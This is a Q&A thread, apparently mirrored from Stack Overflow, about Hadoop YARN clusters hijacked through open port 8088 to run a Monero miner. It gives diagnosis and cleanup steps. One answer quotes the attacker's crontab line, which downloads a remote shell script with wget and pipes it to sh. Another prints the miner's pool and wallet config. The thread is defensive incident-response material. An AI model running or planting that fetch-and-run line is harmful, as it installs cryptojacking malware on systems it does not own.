YARN Dr.who Application Attempt appattempt fail

2019-05-16 17:15发布

问题:

I am getting this error msg in my hadoop cluster. Can someone explain me why ? Somehow more the 2000 job applications are getting created and failing without any reason.

回答1:

This might be a hack... There is a cryptocurrency miner that creates thousands of jobs like this.

Check for cron jobs as yarn on each node that are suspicious and remove them.

    $ sudo -u yarn crontab -e
*/2 * * * * wget -q -O - http://185.222.210.59/cr.sh | sh > /dev/null 2>&1

Then check for a "java" process like this one and kill it.

/var/tmp/java -c /var/tmp/wc.conf

You should also secure all the incoming ports to your cluster to prevent this from coming back.

See this for more info too. https://community.hortonworks.com/questions/191898/hdp-261-virus-crytalminer-drwho.html



回答2:

EDIT: I added small guidelines on how to deal with this problem here Google Cloud Dataproc Virus CrytalMiner (dr.who)

What is probably hapenning to you:

  • the hacker scans every open vulnerability (IP address + port) and stores them to a breach table
  • the hacker scans the breach table and tries to figure out whether you launched or not a cluster recently
  • when a vulnerable cluster is available, the hacker connects to it (everything is open and a vulnerability has been found!)
  • the guy connects to your cluster, removes everything (in my case, the script is named zz.sh and you can find it in the BitBucket link below) then downloads the mining app
  • YARN thinks that workers are failing but I don't even think that a Hadoop application is running anymore.

I suggest you try to find a bitbucket/github address in your error logs. Also you can try to look for a get/wget/apt-get/curl command.

I guess he's rich now.

Two important things:

  • check that your security group configuration is strong enough, without public authorizations everywhere
  • check that your SSH key is not compromised.

Related:

  • how-to-use-the-resourcemanager-web-interface-as-an-user
  • hdp-261-virus-crytalminer-drwho.html


回答3:

On google cloud, a robot attack port 8088 and a launch a lot of yarn applications. 1. In google cloud, I add a firewall rule to stop 8088 access 2. kill all applications in yarn yarn application -list |grep 'dr.who'| awk '$6 == "ACCEPTED" { print $1 }'| while read app; do yarn application -kill "$app"; done 3. kill all process belonging to yarn (previous step free the cpu but your network will burnout after) ps -ef |grep yarn |awk '{ print $2}'|while read p ; do sudo kill -9 $p; done

now use the console to follow yarn ;-)



回答4:

You need to edit your security group for master and slaves and restrict access to the port 8088 which you use to monitor the yarn applications and their logs. resource manager also accepts yarn applications to be aubmitted and run via rest API. click here for more info on RM's REST API. The hacker uses this port to submit an yarn application which wraps a shell script to download monero's binaries and put them into a location such as "/var/tmp/java" and run them. Yarn thinks it is a application but it would be launching mining software. But this is not java, if you run the --version command argument with it you get below result

[hadoop@ip-172-31-28-26 ~]$ /var/tmp/java --version
XMRig 2.6.2
built on Jun 24 2018 with GCC 6.3.0
features: 64-bit AES

Plus if you find the file "/var/tmp/w.conf" open the file and you can see the monero wallet server he is using, his wallet address and password etc. see below, an sample i found on my emr instance

{
"algo": "cryptonight",
"background": true,
"donate-level": 1,
"log-file": null,
"print-time": 60,
"max-cpu-usage": 95,
"pools": [
     {
        "url": "stratum+tcp://163.172.205.136:3333",
        "user": "46CQwJTeUdgRF4AJ733tmLJMtzm8BogKo1unESp1UfraP9RpGH6sfKfMaE7V3jxpyVQi6dsfcQgbvYMTaB1dWyDMUkasg3S",
        "pass": "h",
        "variant": -1
    }
],
"api": {
    "port": 0,
    "access-token": null,
    "worker-id": null
}

}

To summarize, follow below steps to take care of this issue.

  1. Remove public access to any port which is not secured. Especially 8088
  2. check your crontab and remove any entries you dont identify
  3. Remove contents inside directories like "/var/tmp" but make sure they are not yours
  4. Use top command to see the pid of the processes that are taking up all the cpu and kill them

Following above steps will ensure that the mining program wont launch again



标签: hadoop hdfs yarn